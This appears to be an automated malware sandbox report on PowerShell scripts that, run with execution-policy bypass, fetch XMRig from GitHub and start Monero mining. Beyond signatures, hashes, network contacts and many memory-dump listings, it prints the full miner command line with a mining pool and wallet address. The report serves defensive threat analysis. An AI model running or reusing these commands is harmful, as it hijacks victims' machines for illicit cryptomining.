memory/4840-46-0x00000284CCF30000-0x00000284CCF50000-memory.dmp

memory/4840-47-0x00000284CE730000-0x00000284CE750000-memory.dmp

memory/4840-48-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/2088-50-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmp

memory/4840-49-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/2088-51-0x00007FFD124B3000-0x00007FFD124B5000-memory.dmp

memory/4840-52-0x00000284CE750000-0x00000284CE770000-memory.dmp

memory/4840-53-0x00000284CE770000-0x00000284CE790000-memory.dmp

memory/4840-54-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-55-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-56-0x00000284CE750000-0x00000284CE770000-memory.dmp

memory/4840-57-0x00000284CE770000-0x00000284CE790000-memory.dmp

memory/4840-58-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-59-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-60-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-61-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-62-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-63-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-64-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-65-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-66-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-67-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-68-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-69-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-70-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-71-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-72-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-73-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-74-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-75-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-76-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-77-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-78-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-79-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-80-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-81-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-82-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-83-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-84-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-85-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-86-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-87-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-88-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-89-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-90-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-91-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-92-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-93-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-94-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-95-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-96-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-97-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-98-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-99-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-100-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-101-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-102-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-103-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-104-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-105-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-106-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-107-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-108-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-109-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-110-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-111-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-112-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-113-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-114-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-115-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-116-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/3200-2-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp

memory/3200-5-0x000001D478220000-0x000001D478242000-memory.dmp

memory/3200-6-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/3200-9-0x000001D4783D0000-0x000001D478446000-memory.dmp

memory/3200-10-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2l4olqg.t1s.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3200-25-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/3200-48-0x000001D4783B0000-0x000001D4783C2000-memory.dmp

memory/3200-61-0x000001D4783A0000-0x000001D4783AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3372-90-0x000002CF4A660000-0x000002CF4A680000-memory.dmp

memory/3200-91-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp

memory/3200-93-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/3372-92-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-94-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-95-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-96-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-97-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-98-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-99-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-100-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-101-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-102-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-103-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-104-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-105-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-106-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-107-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-108-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-109-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-110-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-111-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-112-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-113-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-114-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-115-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-116-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-117-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-118-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-119-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-120-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-121-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-122-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-123-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-124-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-125-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-126-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-127-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-128-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-129-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-130-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-131-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-132-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-133-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-134-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-135-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-136-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-137-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-138-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-139-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-140-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-141-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-142-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-143-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-144-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-145-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-146-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-147-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-148-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-149-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-150-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-151-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-152-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-153-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-154-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-155-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:59

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp

Files

memory/2092-0-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phr4k5s2.hx3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2092-6-0x000001DDE19E0000-0x000001DDE1A02000-memory.dmp

memory/2092-10-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/2092-11-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/2092-12-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/2092-14-0x000001DDE1AA0000-0x000001DDE1AB2000-memory.dmp

memory/2092-15-0x000001DDE1A80000-0x000001DDE1A8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:54

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cnngbxbz.uzz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
